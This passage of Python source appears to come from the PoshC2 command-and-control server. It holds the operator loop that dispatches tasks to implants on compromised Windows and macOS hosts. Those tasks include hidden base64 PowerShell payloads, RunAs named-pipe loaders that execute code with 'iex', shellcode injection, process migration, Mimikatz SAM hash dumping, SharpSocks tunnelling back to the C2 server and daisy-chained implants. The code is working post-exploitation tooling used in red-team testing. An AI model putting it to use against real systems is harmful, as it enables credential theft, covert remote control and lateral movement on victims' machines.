C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() proxyvar = "$proxypayload = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % payload new_task(proxyvar, randomuri) check_module_loaded("Invoke-RunAs.ps1", randomuri) check_module_loaded("NamedPipeProxy.ps1", randomuri) params = re.compile("invoke-runasproxypayload ", re.IGNORECASE) params = params.sub("", command) pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE'))) new_task(pscommand, randomuri) elif "invoke-runaspayload" in command.lower(): check_module_loaded("Invoke-RunAs.ps1", randomuri) check_module_loaded("NamedPipe.ps1", randomuri) params = re.compile("invoke-runaspayload ", re.IGNORECASE) params = params.sub("", command) pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMS'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE'))) new_task(pscommand, randomuri) elif command.lower() == "help" or command == "?" or command.lower() == "help ": print (posh_help) elif command.lower() == "help 1": print (posh_help1) elif command.lower() == "help 2": print (posh_help2) elif command.lower() == "help 3": print (posh_help3) elif command.lower() == "help 4": print (posh_help4) elif command.lower() == "help 5": print (posh_help5) elif command.lower() == "help 6": print (posh_help6) elif command.lower() == "help 7": print (posh_help7) elif command.lower() == "help 8": print (posh_help8) elif "get-pid" in command.lower(): pid = get_implantdetails(randomuri) print (pid[8]) elif "upload-file" in command.lower(): source = "" destination = "" s = "" args = argp(command) try: if args: with open(args.source, "rb") as source_file: s = source_file.read() source = base64.b64encode(s) if s: destination = args.destination.replace("\\","\\\\") print ("") print ("Uploading %s to %s" % (args.source, destination)) if (args.nothidden): uploadcommand = "Upload-File -Destination \"%s\" -NotHidden %s -Base64 %s" % (destination, args.nothidden, source) else: uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, source) new_task(uploadcommand, randomuri) except Exception as e: print ("Error with source file: %s" % e) traceback.print_exc() elif "kill-implant" in command.lower() or "exit" in command.lower(): impid = get_implantdetails(randomuri) ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0]) if ri.lower() == "n": print ("Implant not terminated") if ri == "": new_task("exit", randomuri) kill_implant(randomuri) if ri.lower() == "y": new_task("exit", randomuri) kill_implant(randomuri) elif "unhide-implant" in command.lower(): unhide_implant(randomuri) elif "hide-implant" in command.lower(): kill_implant(randomuri) elif "migrate" in command.lower(): params = re.compile("migrate", re.IGNORECASE) params = params.sub("", command) migrate(randomuri, params) elif "loadmoduleforce" in command.lower(): params = re.compile("loadmoduleforce ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri, force=True) elif "loadmodule" in command.lower(): params = re.compile("loadmodule ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri) elif "invoke-daisychain" in command.lower(): check_module_loaded("Invoke-DaisyChain.ps1", randomuri) urls = get_allurls() new_task("%s -URLs '%s'" % (command,urls), randomuri) print ("Now use createdaisypayload") elif "inject-shellcode" in command.lower(): #elif (command.lower() == "inject-shellcode") or (command.lower() == "inject-shellcode "): params = re.compile("inject-shellcode", re.IGNORECASE) params = params.sub("", command) check_module_loaded("Inject-Shellcode.ps1", randomuri) readline.set_completer(filecomplete) path = raw_input("Location of shellcode file: ") t = tabCompleter() t.createListCompleter(COMMANDS) readline.set_completer(t.listCompleter) try: shellcodefile = load_file(path) if shellcodefile != None: arch = "64" new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), randomuri) new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), randomuri) except Exception as e: print ("Error loading file: %s" % e) elif "listmodules" in command.lower(): print (os.listdir("%s/Modules/" % POSHDIR)) elif "modulesloaded" in command.lower(): ml = get_implantdetails(randomuri) print (ml[14]) elif (command.lower() == "ps") or (command.lower() == "ps "): new_task("get-processlist", randomuri) elif (command.lower() == "hashdump") or (command.lower() == "hashdump "): check_module_loaded("Invoke-Mimikatz.ps1", randomuri) new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", randomuri) elif (command.lower() == "sharpsocks") or (command.lower() == "sharpsocks "): check_module_loaded("SharpSocks.ps1", randomuri) import string from random import choice allchar = string.ascii_letters channel = "".join(choice(allchar) for x in range(25)) sharpkey = gen_key() sharpurls = get_sharpurls() sharpurl = select_item("HostnameIP", "C2Server") new_task("Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 2000" % (sharpurl,channel,sharpkey,sharpurls), randomuri) print ("git clone https://github.com/nettitude/SharpSocks.git") print ("SharpSocksServerTestApp.exe -c %s -k %s -l http://IPADDRESS:8080" % (channel,sharpkey)) elif (command.lower() == "history") or command.lower() == "history ": startup(get_history()) elif "reversedns" in command.lower(): params = re.compile("reversedns ", re.IGNORECASE) params = params.sub("", command) new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, randomuri) elif "createdaisypayload" in command.lower(): createdaisypayload() elif "createproxypayload" in command.lower(): createproxypayload() elif "createnewpayload" in command.lower(): createproxypayload() else: if command: new_task(command, randomuri) return return def commandloop(implant_id): while(True): try: implant_id_orig = implant_id t = tabCompleter() t.createListCompleter(COMMANDS) readline.set_completer_delims('\t') readline.parse_and_bind("tab: complete") readline.set_completer(t.listCompleter) if ("-" in implant_id.lower()) or ("all" in implant_id.lower()) or ("," in implant_id.lower()): print (Colours.GREEN) command = raw_input("%s> " % (implant_id)) else: hostname = get_hostdetails(implant_id) if hostname[15] == 'OSX': t.createListCompleter(UXCOMMANDS) readline.set_completer_delims('\t') readline.parse_and_bind("tab: complete") readline.set_completer(t.listCompleter) if hostname[15] == 'C#': t.createListCompleter(SHARPCOMMANDS) readline.set_completer_delims('\t') readline.parse_and_bind("tab: complete") readline.set_completer(t.listCompleter) print (Colours.GREEN) print ("%s @ %s (PID:%s)" % (hostname[11],hostname[3],hostname[8])) command = raw_input("%s> " % (implant_id)) # if "all" run through all implants get_implants() if implant_id.lower() == "all": if command == "back": startup() implant_split = get_implants() if implant_split: for implant_id in implant_split: runcommand(command, implant_id[1]) # if "seperated list" against single uri elif "," in implant_id: implant_split = implant_id.split(",") for implant_id in implant_split: implant_id = get_randomuri(implant_id) runcommand(command, implant_id) # if "range" against single uri elif "-" in implant_id: implant_split = implant_id.split("-") for implant_id in range(int(implant_split[0]), int(implant_split[1])+1): try: implant_id = get_randomuri(implant_id) runcommand(command, implant_id) except Exception as e: print ("Unknown ImplantID") # else run against single uri else: implant_id = get_randomuri(implant_id) runcommand(command, implant_id) # then run back around commandloop(implant_id_orig) except Exception as e: print (Colours.RED) print ("Error running against the selected implant ID, ensure you have typed the correct information") #print Colours.END #traceback.print_exc() #print "Error: %s" % e # remove the following comment when publishing to live time.sleep(1) startup() if __name__ == '__main__': original_sigint = signal.getsignal(signal.SIGINT) signal.signal(signal.SIGINT, catch_exit) startup()